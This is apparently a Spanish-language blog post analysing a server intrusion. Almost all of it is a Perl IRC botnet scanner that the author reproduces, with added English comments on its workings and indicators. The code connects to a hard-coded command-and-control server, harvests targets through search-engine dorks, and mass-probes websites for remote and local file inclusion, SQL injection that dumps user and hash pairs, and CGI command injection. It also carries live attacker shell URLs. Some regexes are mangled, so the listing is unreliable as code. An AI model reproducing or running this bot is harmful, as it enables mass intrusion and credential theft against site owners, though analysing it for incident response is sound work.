Análisis de una intrusión y un bot
Este es un mini caso de estudio sobre lo que encontré hace poco en un servidor que tuvo una intrusión: veían cómo se cargaba el servidor en CPU y memoria y, obviamente, se cargaba por el acceso a I/O y por todos los procesos de escaneo que hacían sin piedad. ¿Dónde quedaron los tiempos en que tenías hackers que eran INVISIBLES y no inservibles? Pero bueno, ¿qué sé yo, no? jajajajaja
Bueno, me tocó ayudar a una persona a la que le hicieron una intrusión con inclusión de código; es bastante interesante porque se vio ejecutar `perl Scan2009.txt`, que me llamó la atención, y lo conseguí del sitio desde donde el ataque bajó el botnet:
http://matudesign.com/dh/imagenes/Scan2009.txt
#!/usr/bin/perl
##################################################################
## ##
## ##
## 05/06/2008 ##
## Author : BitchX and Osirys ## ##
## Team : FullNetWork ##
## Ircd : irc.fullnetwork.org ##
## WebSite : ##
## Contact : safes[dot]modes[at]gmail[dot]com ##
## ##
## ##
## Release: v1 Private ##
## ##
## ##
#####################################################################################
### !!_/ PRIVATE
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
#######################################################
## CONFIGURATION //
#######################################################
# --- Bot configuration: every value below is hard-coded by the operator.
# Remote file appended to each RFI probe (see rfi()); it shows up verbatim in the
# scanned site's access log as part of the request, which makes it a usable IoC.
my $id = "http://matudesign.com/dh/imagenes/02.txt??"; #Your RFI Response
#Shell printed on the Vulnerable Site
my $shell = "http://matudesign.com/dh/imagenes/cmd-shell.txt??";
# IRC C&C endpoint: outbound TCP to this host/port from a web server is the network signature.
my $ircd = "64.136.61.195";
my $port = "7000";
my $chan1 = "#offspring"; #Chan for Scan
my $chan2 = "#offspring"; #bot will be printed here too
my $nick = "[D]PRIVATE".(int(rand(100)));
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time.
#For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
#Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results,
# you can put a higher number, so more speed.
my $rfipidpr0c = 50;
my @User_Agent = &Agent();
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://matudesign.com/dh/imagenes/01.txt??";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol";
my $spreadpwd = "lol";
# NOTE(review): `!=` on the next three lines is a numeric comparison in void context,
# not an assignment, so these variables are declared but stay undef; the fourth
# line (`=!`) stores the logical negation of $cmdpwd.
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
# Drops a helper script `rm.txt` in the working directory that deletes the
# `*siti*` result files; it is executed by the !kill handler in irc().
# The file itself is a host artefact worth looking for after an incident.
open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;
# Shell-outs at startup; the values are not referenced anywhere else in this listing.
my $sys = `uname -a`;
my $up = `uptime`;
# $t5 / $y5 mirror the two feature flags as ON/OFF text; not used elsewhere in this listing.
if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}
if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}
# Package-global line counter, incremented per IRC line in irc() and used to
# build per-scan result file names.
$k=0;
# Daemonise: the child runs the IRC loop, the parent exits immediately, so the
# bot survives the shell that launched it and shows up as an orphaned `perl`
# process holding a socket to $ircd:$port.
if ( fork() == 0 ) {
&irc( $ircd, $port, $chan1, $chan2, $nick );
}
else {
exit;
}
# Main C&C loop: connects to the IRC server, registers, joins the channels and
# dispatches channel commands (!kill, .rfi, !xml, !cgi, !pb, !lfi, !php, !sql).
# Each scan command forks a child that runs the scan and exits, so the loop
# keeps reading the socket. The empty `()` prototype is bypassed by the `&irc(...)`
# call at the top of the file.
sub irc () {
my ( $ircd, $port, $chan1, $chan2, $nick ) = @_;
# $c0n is a package global on purpose: writ1()/writ2()/priv8() print to it.
$c0n = IO::Socket::INET->new(
PeerAddr => "$ircd",
PeerPort => "$port",
Proto => "tcp"
) or die "Can not connect on server!\n";
$c0n->autoflush(1);
print $c0n "NICK $nick\n";
print $c0n "USER priv 8 * : BitchX\n";
# One iteration per line received from the server.
while ( $line = <$c0n> ) {
# Re-run on every line; the results are not used anywhere in this listing.
my $sys = `uname -a`;
my $up = `uptime`;
if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}
if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}
$k++;
# Keep-alive. No "\n" is appended; only the "\r" captured from the incoming
# line (`.` does not match "\n") terminates the reply.
if ( $line =~ /^PING \:(.*)/ ) {
print $c0n "PONG :$1";
}
# Intended for the 001 welcome numeric, but matches any line containing "001".
if ( $line =~ /001/ ) {
print $c0n "JOIN $chan1\n";
writ1("4+1 Private v2 Scan ON");
writ1("4+1 Coded by BitchX and Osirys");
print $c0n "JOIN $chan2\n";
}
# Self-destruct: runs the rm.txt helper (deletes *siti* files) and then kills
# every perl process on the host. With $securityACT == 0 any channel member can
# trigger it with a bare !kill.
if (($line=~ /PRIVMSG $nick :!kill -p $killpwd/) && ($securityACT == 1)) {
writ1("Falow Hermano! ");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
elsif (($line=~ /PRIVMSG $nick :!kill -p $badkillpwd/) && ($securityACT == 1)) {
writ1("Error Killing the Bot (Null or bad Password) !");
}
elsif (($line=~ /PRIVMSG $chan1 :!kill/) && ($securityACT == 0)) {
writ1("Falow Hermano");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
# .rfi <bug> <dork> -p<N>: fork() only runs when the regex matched (short-circuit
# &&); the child captures $1..$3, gathers hosts with find(), probes them with
# rfi() and exits. Result file name is "<k>asiti.txt".
if (($line =~ /PRIVMSG $chan1 :.rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/) && (fork() == 0)) {
my ($bug, $dork, $rfipid) = ($1, $2, $3);
writ1("4+1Status - Scan RFI Iniciando em 4- $rfipid sites/process ");
writ1("1Bug:14 $bug");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk");
my $a = $k . "a";
my $n4me = $a . "siti.txt";
find($d0rk, $n4me);
rfi($bug, $n4me, $d0rk, $rfipid);
writ1("4+1Status - Scan RFI Finalizado em 4- 1Dork:14 $d0rk");
exit(0);
}
# !xml <bug> <dork>: result file "<k>bsiti.txt".
if (($line =~ /PRIVMSG $chan1 :!xml\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork) = ($1, $2);
writ1("4+1Status - Scan XML Iniciando ");
writ1("1Bug:14 $bug ");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk ");
my $b = $k . "b";
my $n4me = $b . "siti.txt";
find($d0rk, $n4me);
xml($bug, $n4me, $d0rk);
writ1("4+1Status - Scan XML Finalizado em 4- 1Dork:14 $d0rk ");
exit(0);
}
# !cgi <bug> <dork> <inject>. NOTE: $b is assigned but the undefined $c is used
# for the name, so the result file is just "siti.txt" (same slip in the !pb,
# !lfi, !php and !sql handlers below).
if (($line =~ /PRIVMSG $chan1 :!cgi\s+(.*?)\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork, $icgi) = ($1, $2, $3);
writ1("4+1Status - Scan CGI Iniciando ");
writ1("1Bug:14 $bug ");
writ1("1Inject CGI:14 $icgi ");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk ");
my $b = $k . "c";
my $n4me = $c . "siti.txt";
find($d0rk, $n4me);
cgi($bug, $n4me, $d0rk, $icgi);
writ1("4+1Status - Scan CGI Finalizado em 4- 1Dork:14 $d0rk ");
exit(0);
}
# !pb <bug> <dork>: only two captures exist, so $ipb stays undef.
if (($line =~ /PRIVMSG $chan1 :!pb\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork, $ipb) = ($1, $2);
writ1("4+1Status - Scan PB SQL INJ Iniciando ");
writ1("1Bug:14 $bug ");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk ");
my $b = $k . "d";
my $n4me = $d . "siti.txt";
find($d0rk, $n4me);
pb($bug, $n4me, $d0rk);
writ1("4+1Status - Scan PB SQL INJ Finalizado em 4- 1Dork:14 $d0rk ");
exit(0);
}
# !lfi <bug> <dork>
if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork) = ($1, $2);
writ1("4+1Status - Scan LFI Iniciando ");
writ1("1Bug:14 $bug ");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk ");
my $b = $k . "e";
my $n4me = $e . "siti.txt";
find($d0rk, $n4me);
lfi($bug, $n4me, $d0rk);
writ1("4+1Status - Scan LFI Finalizado em 4- 1Dork:14 $d0rk ");
exit(0);
}
# !php <bug> <dork>
if (($line =~ /PRIVMSG $chan1 :!php\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork) = ($1, $2);
writ1("4+1Status - Scan PHP Iniciando ");
writ1("1Bug:14 $bug ");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk ");
my $b = $k . "f";
my $n4me = $f . "siti.txt";
find($d0rk, $n4me);
php($bug, $n4me, $d0rk);
writ1("4+1Status - Scan PHP Finalizado em 4- 1Dork:14 $d0rk ");
exit(0);
}
# !sql <bug> <dork> -p<N>: the status line interpolates $rfipid, which is not
# set in this branch (the capture went into $sqlpid).
if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/) && (fork() == 0)) {
my ($bug, $dork, $sqlpid) = ($1, $2, $3);
writ1("4+1Status - Scan SQL Iniciando em 4- $rfipid sites/process ");
writ1("1Bug:14 $bug ");
$d0rk = clean($dork);
writ1("1Dork:14 $d0rk ");
my $c = $k . "g";
my $n4me = $g . "siti.txt";
find($d0rk, $n4me);
sql($bug, $n4me, $d0rk, $sqlpid);
writ1("4+1Status - Scan SQL Finalizado em 4- 1Dork:14 $d0rk ");
exit(0);
}
}
}
# Target harvesting: forks one child per search engine (twelve in total), each
# of which appends the hosts it scraped for $dork to the shared file $name and
# reports its count to the channel before exiting. The parent waits for all of
# them. This fan-out is what produced the CPU/IO load the post describes.
sub find () {
my $dork = $_[0];
my $name = $_[1];
my @engine;
$engine[0] = fork();
if ( $engine[0] == 0 ) {
my @glist = google( $dork, $name );
writ1("4+1Status - Total Encontrado GOOGLE ". scalar(@glist). " " );
exit;
}
$engine[1] = fork();
if ( $engine[1] == 0 ) {
my @all = alltheweb( $dork, $name );
writ1("4+1Status - Total Encontrado ALLTHEWEB ". scalar(@all). " " );
exit;
}
$engine[2] = fork();
if ( $engine[2] == 0 ) {
my @alt = altavista( $dork, $name );
writ1("4+1Status - Total Encontrado ALTAVISTA ". scalar(@alt). " " );
exit;
}
$engine[3] = fork();
if ( $engine[3] == 0 ) {
my @emsn = msn( $dork, $name );
writ1("4+1Status - Total Encontrado MSN ". scalar(@emsn). " " );
exit;
}
$engine[4] = fork();
if ( $engine[4] == 0 ) {
my @ysites = yahoo( $dork, $name );
writ1("4+1Status - Total Encontrado YAHOO ". scalar(@ysites). " " );
exit;
}
$engine[5] = fork();
if ( $engine[5] == 0 ) {
my @asksites = ask( $dork, $name );
writ1("4+1Status - Total Encontrado ASK ". scalar(@asksites). " " );
exit;
}
$engine[6] = fork();
if ($engine[6] == 0) {
my @aolsites = aol($dork,$name);
writ1("4+1Status - Total Encontrado AOL ". scalar(@aolsites). " " );
exit;
}
$engine[7] = fork();
if ( $engine[7] == 0 ) {
my @dmozsites = dmoz( $dork, $name );
writ1("4+1Status - Total Encontrado DMOZ ". scalar(@dmozsites). " " );
exit;
}
$engine[8] = fork();
if ($engine[8] == 0) {
my @webdesites = webde($dork,$name);
writ1("4+1Status - Total Encontrado WEB.DE ". scalar(@webdesites). " " );
exit;
}
$engine[9] = fork();
if ($engine[9] == 0) {
my @einetsites = einet($dork,$name);
writ1("4+1Status - Total Encontrado eiNET.net ".scalar(@einetsites)." " );
exit;
}
$engine[10] = fork();
if ($engine[10] == 0) {
my @virgilio = virgilio($dork, $name);
writ1("4+1Status - Total Encontrado VIRGILIO ". scalar(@virgilio). " ");
exit(0);
}
$engine[11] = fork();
if ($engine[11] == 0) {
my @abacho = abacho($dork,$name);
writ1("4+1Status - Total Encontrado ABACHO ".scalar(@abacho)." ");
exit(0);
}
# Reap every engine child before returning to the caller.
foreach my $e(@engine){
waitpid($e,0);
}
}
# RFI probe: reads the harvested host list from $name, deletes the file,
# de-duplicates, then forks up to $rfipid concurrent children, each fetching
# "http://<site><bug><$id>??" and checking the response for the marker string.
# From the scanned site's point of view this is a burst of requests whose
# query contains the $id URL — the thing to grep for in access logs.
sub rfi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $rfipid = $_[3];
my @forks;
my $num = 0;
# Bareword handle, unchecked open. NOTE: the readline operand on the next line
# (`<filez>`) was lost when this listing was extracted.
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
# @tot is a package global (no `my`); remove() shells out to `rm`.
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
sleep(1);
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
my $test = "http://" . $site . $bug . $id . "??";
# Every probe URL is echoed to the bot's stdout.
print "$test\n";
# $count is a package global; every $rfipid iterations the parent reaps the
# current batch and reuses the @forks slots.
$count++;
if ( $count % $rfipid == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
# Empty block: no-op.
if($count %100 == 0){
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug . $id . "??";
my $print = "http://" . $site . $bug . $shell . "?";
my $re = query($test,"3");
# A hit is the "3b1tchx3mailOK" marker; the presence of a `uid=` string
# decides the "Safe: OFF"/"Safe: ON" label. os() fills the globals
# $os, $un and $id1 with a second request.
if ( $re =~ /3b1tchx3mailOK/ && $re =~ /uid=(.*)(([0-9,a-f]))/ ) {
os($test);
writ1("4+1Safe: OFF 4+ 1OS: $os 4+1 $print ");
writ1("4+1Uname -a: $un ");
writ1("4+1Uid / Gid: $id1 ");
writ2("");
}
elsif ( $re =~ /3b1tchx3mailOK/ ) {
os($test);
writ1("4+1Safe: ON 4+ 1OS: $os 4+1 $print ");
writ1("4+1Uname -a: $un ");
writ1("4+1Uid / Gid: $id1 ");
writ2("");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# XML-RPC probe: same read/dedupe/fork pattern as rfi() with a fixed batch of
# 100 children; a site is reported when the response to "http://<site><bug>"
# contains the three XML-RPC fault strings below.
sub xml () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
# NOTE: readline operand (`<filez>`) lost in extraction; @tot is a package global.
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug;
my $print = "http://" . $site . $bug;
my $re = query($test,"3");
if ( $re =~ /faultCode/ && $re =~ /faultString/ && $re =~ /XML error: no element found at line 1/ ) {
writ1("4+1Safe Bug XML: $print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# Web-shell fingerprinting: requests the bare "http://<site>" ($bug is read but
# not used in the URL) and reports the host when the body looks like an
# already-planted PHP shell (disk "Free … of …" line, a safe_mode/PHP version
# banner, or the c999Shell string).
sub php () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
# NOTE: readline operand (`<filez>`) lost in extraction; @tot is a package global.
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site;
my $print = "http://" . $site;
my $re = query($test,"3");
if ( $re =~ /Free (.+?).(.+?) (.+?) of (.+?).(.+?) (.+?)/ ) {
writ1("4+1Safe Bug PHP: $print ");
writ2("");
}
elsif ( $re =~ /safe_mode: (.+?)/ && $re =~ /PHP version: (.+?)/ && $re =~ /cURL: (.+?)/ && $re =~ /MySQL: (.+?)/ && $re =~ /MSSQL: (.+?)/ && $re =~ /PostgreSQL: (.+?)/ && $re =~ /Oracle: (.+?)/ ) {
writ1("4+1Safe Bug PHP: $print ");
writ2("");
}
elsif ( $re =~ /c999Shell v. 1.0 pre-release build/ ) {
writ1("4+1Safe Bug PHP: $print ");
writ2("");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# CGI probe: fetches "http://<site><bug><icgi>" and, when the body carries the
# "l33tb1tchx1" marker plus a `uid=` string, issues a second request with a
# pipe-wrapped uname payload ($osinj) and reports the host. query() is called
# with one argument here; the "3" other callers pass is ignored anyway.
sub cgi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $icgi = $_[3];
my @forks;
my $num = 0;
# NOTE: readline operand (`<filez>`) lost in extraction; @tot is a package global.
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug . $icgi;
my $print = "http://" . $site . $bug . $icgi;
my $osinj = "|uname%20-a|";
my $os = "http://" . $site . $bug . $osinj;
my $re = query($test);
if ( $re =~ /l33tb1tchx1/ && $re =~ /uid=(.*)(([0-9,a-f]))/ ) {
# cgi_os() sets the global $un_cgi.
cgi_os($os);
writ1("4+1Safe Bug CGI OFF: $print ");
writ1("4+1Uname -a: $un_cgi ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# "PB" SQL-injection probe: fetches "http://<site><bug>" and reports the host
# when the body contains the "l33tb1tchxPB'" marker.
sub pb () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
# NOTE: readline operand (`<filez>`) lost in extraction; @tot is a package global.
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug;
my $print = "http://" . $site . $bug;
my $re = query($test,"3");
if ( $re =~ /l33tb1tchxPB'/ ) {
writ1("4+1Safe Bug PB SQL INJ: $print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# LFI probe: appends a fixed "../"-traversal to /etc/passwd with a trailing
# null byte to "http://<site><bug>" and reports the host when "root:x:" appears
# in the body. The traversal string is a convenient WAF/log signature.
sub lfi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
# NOTE: readline operand (`<filez>`) lost in extraction; @tot is a package global.
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $inj = "../../../../../../../../../../../../../etc/passwd%00";
my $test = "http://" . $site . $bug . $inj;
my $print = "http://" . $site . $bug . $inj;
my $re = query($test,"3");
if ( $re =~ /root:x:/ ) {
writ1("4+1Safe Bug LFI: $print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# SQL-injection probe: fetches "http://<site><bug>", looks for a
# "<name>:<32 hex chars>" pair in the body and reports it. Full details
# (user and hash) are posted only when the requested concurrency equals
# $sqlpidpr0c; with a higher value only the URL is posted. Concurrency is
# $sqlpid children per batch.
sub sql() {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $sqlpid = $_[3];
my @forks;
my $num = 0;
# $file and @tot are package globals (no `my`); open is unchecked.
open($file, "<", $name);
while (my $a = <$file>) {
$a =~ s/\n//g;
push(@tot,$a);
}
close($file);
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1Dork4:14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site(@toexploit) {
# Probe URL echoed to stdout before the fork.
my $test = "http://".$site.$bug; print "$test\n";
$count++;
if($count %$sqlpid == 0){
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://".$site.$bug;
my $print = "http://".$site.$bug;
my $re = query($test);
# Three progressively looser patterns for a name:hash pair; the `/g` in
# scalar context only advances pos() and does not loop here.
if ($re =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
if ($sqlpid == $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
writ1("4+1User: $user ");
writ1("4+1Hash: $hash ");
writ2("4+1SQL INJ: $print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
}
}
elsif ($re =~ m/:(.*)([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
# Strip anything tag-like from the name and drop it if markup remains.
$user =~ s/\<(.*)\>//g;
if ($user !~ /(\/|\<|\>|\")/) {
if ($sqlpid == $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
writ1("4+1User: $user ");
writ1("4+1Hash: $hash ");
writ2("4+1SQL INJ: $print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
}
}
}
elsif ($re =~ m/\"option\">(.*)([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
$user =~ s/<(.*)>//g;
$user =~ s/<|>//g;
if ($sqlpid == $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
writ1("4+1User: $user ");
writ1("4+1Hash: $hash ");
writ2("4+1SQL INJ: $print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
}
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
# Google front-end: issues a canary search first and, depending on whether the
# body contains "2008 Google", either scrapes Google directly (gfind) or falls
# back to a look-alike engine (gbypass). The canary URL has no scheme, so what
# LWP returns for it is whatever its error path produces — presumably never the
# marker; verify before relying on this branch.
sub google () {
my @gsites;
my $key = $_[0];
my $name = $_[1];
my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
my $ret = query($gtest);
if ($ret =~ /2008 Google/) {
@gsites = gfind($key,$name);
}
else {
writ1("1Banned by Google Engine, trying to bypass it!");
@gsites = gbypass($key,$name);
}
return @gsites;
}
# Scrapes ten pages of 100 results from google.it for the encoded dork, expands
# each hit with links() (url, host, dir) and appends them to $name.
# NOTE(review): the result-extraction regex on the `while` line was mangled
# when this listing was extracted; the original pattern is not recoverable here.
sub gfind () {
my @list;
my $key = $_[0];
my $name= $_[1];
# $p is a package global (no `my`).
for ($p = 0;$p <= 900; $p += 100) {
my $g0gle = ("www.google.it/search?q=".key($key)."&num=100&hl=it&as_qdr=all&start=".$p."&sa=N");
my $gr = query($g0gle);
while ($gr =~ m/\"]*)\//g) {
my $k = $1;
if ($k !~ /google/) {
my @grep = links($k);
# Appended under a bareword-free but unchecked open; the file is shared
# with the other engine children forked by find().
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push(@list, @grep);
}
}
}
return @list;
}
# Fallback when Google blocks the bot: pages through euroseek.com (100 pages of
# 10) and appends the expanded hits to $name.
# NOTE(review): the `m//g` on the `while` line is an empty pattern — the real
# regex was lost in extraction, so $1 is not established by this listing.
sub gbypass () { # Euroseek uses the same search type of google
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $p = 0 ; $p <= 1000 ; $p += 10 ) {
my $gp = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$p."&string=".key($key));
my $re = query($gp);
while ($re =~ m//g ) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
return @lst;
}
# alltheweb.com scraper: eleven pages of 100 hits; every "http://…" up to the
# next space in the body is treated as a result, expanded with links() and
# appended to $name. $i is a package global.
sub alltheweb() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
my $All = ( "http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$i."&ocjp=1&q=".key($key)."&o=".$i );
my $re = query($All);
while ( $re =~ m/http:\/\/(.+?)\ /g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
return @lst;
}
# it.altavista.com scraper: steps through result offsets of 10 and stops early
# when the page has no "Succ" (next-page) link. $b is a package global.
# NOTE(review): the `while` regex and the first `s//g` below lost their
# patterns in extraction; as printed, `s//g` reuses the last successful
# pattern, which is not what the author wrote.
sub altavista() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ($b = 1;$b <= 1000;$b += 10) {
my $Alt = ( "http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=". key($key) . "&stq=". $b );
my $re = query($Alt);
while ( $re =~ m/(.+?)\//g ) {
if ( $1 !~ /altavista/ ) {
my $k = $1;
$k =~ s//g;
$k =~ s/ //g;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
# Empty true-branch: only the else (early return) does anything.
if ( $re =~ /target=\"_self\">Succ/ ) { }
else {
return @lst;
}
}
return @lst;
}
# search.live.com scraper: 100 pages of 10; hits whose text mentions msn/live
# are skipped, the rest are expanded with links() and appended to $name.
# NOTE(review): the `while` regex was mangled in extraction.
sub msn() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $Msn = ( "http://search.live.com/results.aspx?q=". key($key). "&first=". $b. "&FORM=PERE" );
my $re = query($Msn);
while ( $re =~ m/\"]*)\//g ) {
if ( $1 !~ /msn|live/ ) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
# Yahoo front-end: a canary search for "hello" decides between no results,
# direct scraping (yfind) and the GoodSearch fallback (ybypass) when the
# expected title is missing (treated as being blocked).
sub yahoo () {
my @ysites;
my $key = $_[0];
my $name = $_[1];
my $ytest = ("http://www.search.yahoo.com/search?p=hello&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=1");
my $ret = query($ytest);
if ($ret =~ /We did not find results for/) {
return @ysites;
}
elsif ($ret =~ /title=\"Yahoo! Search results for hello\"/) {
@ysites = yfind($key,$name);
return @ysites;
}
else {
writ1("1Banned by Yahoo Engine, trying to bypass it !");
@ysites = ybypass($key,$name);
return @ysites;
}
}
# search.yahoo.com scraper, 100 pages of 10.
# NOTE(review): both the `while` pattern (`m//g`, empty) and the filter
# alternation (`/yahoo|/`, which matches everything because of the empty
# alternative) were mangled in extraction.
sub yfind() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $ylink = ( "http://search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $re = query($ylink);
while ( $re =~ m//g ) {
my $k = $1;
if ($k !~ /yahoo|/) {
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
# GoodSearch fallback for Yahoo: one canary query, then up to 50 pages; the
